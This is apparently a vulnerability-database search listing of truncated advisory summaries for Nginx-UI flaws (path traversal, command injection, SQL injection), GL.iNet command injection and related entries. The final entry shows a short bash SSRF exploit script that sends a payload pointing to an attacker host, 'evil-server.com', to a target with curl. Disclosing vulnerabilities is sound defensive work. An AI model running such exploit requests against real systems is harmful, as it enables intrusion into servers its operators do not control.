6261 matches found
CVE-2024-23827
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
Remote code execution
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
CVE-2024-23827 Nginx-UI arbitrary file write through the Import Certificate feature
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
CVE-2024-23827
Summary of CVE-2024-23827 (Nginx-UI) Nginx-UI (github.com/0xJacky/Nginx-UI) exposes an Import Certificate feature via the API endpoint /api/cert which allows writing uploaded certificate data and keys to arbitrary filesystem paths. The write logic accepts path fields (ssl_certificate_path, ssl_ce...
CVE-2024-23827 Nginx-UI arbitrary file write through the Import Certificate feature
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
CVE-2024-23827 Nginx-UI arbitrary file write through the Import Certificate feature
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
Nginx UI Path Traversal Vulnerability
Nginx UI is a WebUI for Nginx by Jacky Personal Developer. A path traversal vulnerability exists in versions of Nginx UI prior to 2.0.0.beta.12, which stems from the Import Certificates feature that allows arbitrary writes, which does not check if user-supplied input is a certificate or key, and...
Nginx UI Injection Vulnerability
Nginx UI is a WebUI for Nginx by Jacky's personal developer. An injection vulnerability exists in versions of Nginx UI prior to 2.0.0.beta.12, which stems from the vulnerability to arbitrary command execution attacks when changing the value of testconfigcmd or startcmd...
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the...
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to an authenticated arbitrary command execution via CRLF attack when changing the value of testconfigcmd or startcmd. This vulnerability exists due to an incomplete fix for CVE-2024-22197 and CVE-2024-22198. This...
GL.iNet Unauthenticated Remote Command Execution via the logread module.
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the glsystemlog and glcrashlog interface in the logread module. This exploit requires post-authentication using the Admin-Token...
GL.iNet Unauthenticated Remote Command Execution Exploit
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the glsystemlog and glcrashlog interface in the logread module. This Metasploit exploit requires post-authentication using the...
The vulnerability of the Nginx UI server’s user interface allows attackers to cause service failures, increase their privileges, and expose sensitive information.
The vulnerability of the Nginx UI server’s user interface is related to the lack of measures taken at the management level to clean data. Exploiting this vulnerability can allow a remote attacker to cause service failures, increase their privileges, and expose sensitive information through a...
The vulnerability of the Nginx UI server’s user interface allows a perpetrator to gain unauthorized access to protected information.
The vulnerability of the Nginx UI server’s user interface relates to the lack of measures taken to protect the SQL query structure. Exploiting this vulnerability can allow an attacker operating remotely to gain unauthorized access to protected information...
The vulnerability of the Nginx UI server’s user interface allows a hacker to execute arbitrary commands.
The vulnerability of the Nginx UI server’s user interface is related to the lack of measures taken at the management level to clean data. Exploiting this vulnerability allows a remote attacker to execute arbitrary commands by modifying the startcmd parameter...
Security Bulletin: IBM Maximo Application Suite uses Remote Integer Buffer Overflow Vulnerability which is vulnerable to CVE-2017-7529
Summary IBM Maximo Application Suite uses Remote Integer Buffer Overflow Vulnerability which is vulnerable to CVE-2017-7529. This bulletin contains information regarding the vulnerability and its fixture. Vulnerability Details CVEID:CVE-2017-7529 DESCRIPTION: Nginx could allow a remote attacker t...
GO-2024-2463 SQL injection in github.com/0xJacky/Nginx-UI
SQL injection in github.com/0xJacky/Nginx-UI...
GO-2024-2464 Remote command execution in github.com/0xJacky/Nginx-UI
Remote command execution in github.com/0xJacky/Nginx-UI...
Exploit for Improper Input Validation in Kubernetes Ingress-Nginx
CVE-2023-5044 Ingress Nginx Exploit Proof-Of-Concept This is...
HaoKeKeJi YiQiNiu Server-Side Request Forgery
!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...